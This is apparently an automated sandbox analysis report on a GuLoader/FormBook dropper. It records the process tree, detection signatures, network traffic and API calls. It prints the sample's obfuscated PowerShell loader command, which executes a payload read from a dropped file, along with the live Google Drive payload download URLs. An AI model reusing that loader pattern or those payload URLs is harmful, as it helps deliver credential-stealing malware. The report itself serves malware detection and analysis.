
Windows Analysis Report
textless.exe

Overview

General Information

Sample name: textless.exe
Analysis ID: 1633447
MD5: 9e8270179f04d867463a09af7ee36e32
SHA1: e32b5ff6d109b529112f35c8f639fbb1bb5f4986
SHA256: cc357e0c0d1b4b0c9cdaaa2f7fd530c7fcee6c62136462c1533d50971f97d976
Tags: exe, HUN, user-smica83

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • textless.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\textless.exe" MD5: 9E8270179F04D867463A09AF7EE36E32)
    • powershell.exe (PID: 6504 cmdline: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Versificator.exe (PID: 3016 cmdline: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe" MD5: 9E8270179F04D867463A09AF7EE36E32)
        • 0ogHncCUa.exe (PID: 5556 cmdline: "C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\ZLQzzyNy0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • logman.exe (PID: 2564 cmdline: "C:\Windows\SysWOW64\logman.exe" MD5: AE108F4DAAB2DD68470AC41F91A7A4E9)
            • 0ogHncCUa.exe (PID: 5068 cmdline: "C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\o7geodUa.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Versificator.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Versificator.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Versificator.exe, ParentCommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6504, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", ProcessId: 3016, ProcessName: Versificator.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", CommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\textless.exe", ParentImage: C:\Users\user\Desktop\textless.exe, ParentProcessId: 6400, ParentProcessName: textless.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", ProcessId: 6504, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5796, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T11:24:30.451932+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49692 | 216.58.212.142 | 443 | TCP

            AV Detection

Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | ReversingLabs: Detection: 23%
Source: textless.exe | Virustotal: Detection: 30%
Source: textless.exe | ReversingLabs: Detection: 23%
Source: Yara match | File source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: textless.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49693 version: TLS 1.2
Source: textless.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: logman.pdb source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Versificator.exe, Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: logman.pdbGCTL source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0ogHncCUa.exe, 0000000E.00000002.2117421157.000000000030F000.00000002.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose, 0_2_00406167
Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405705
Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\textless.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\logman.exe | Code function: 4x nop then xor eax, eax 15_2_02749E40
Source: C:\Windows\SysWOW64\logman.exe | Code function: 4x nop then pop edi 15_2_0274E6CC
Source: C:\Windows\SysWOW64\logman.exe | Code function: 4x nop then pop edi 15_2_0274E70A
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49692 -> 216.58.212.142:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1494796227.000000000098A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000004.00000002.2121276429.0000025525000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: textless.exe, textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svchost.exe, 00000004.00000002.2119751877.000002551FAA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws
Source: powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/H
Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2024837477.0000000020620000.00000004.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011648145.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL
Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OLX(
Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: Versificator.exe, 0000000B.00000003.1916473747.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916473747.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download
Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download1A
Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=downloadle
Source: svchost.exe, 00000004.00000003.1203307470.0000025524E59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004051BA

            E-Banking Fraud

Source: Yara match | File source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Versificator.exe
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21274340 NtSetContextThread
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21274650 NtSuspendThread
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272B60 NtClose
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272BA0 NtEnumerateValueKey
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272B80 NtQueryInformationFile
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272BE0 NtQueryValueKey
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272BF0 NtAllocateVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272AB0 NtWaitForSingleObject
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272AF0 NtWriteFile
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272AD0 NtReadFile
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272D30 NtUnmapViewOfSection
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272D00 NtSetInformationFile
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272D10 NtMapViewOfSection
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272DB0 NtEnumerateKey
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272DD0 NtDelayExecution
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272C00 NtQueryInformationProcess
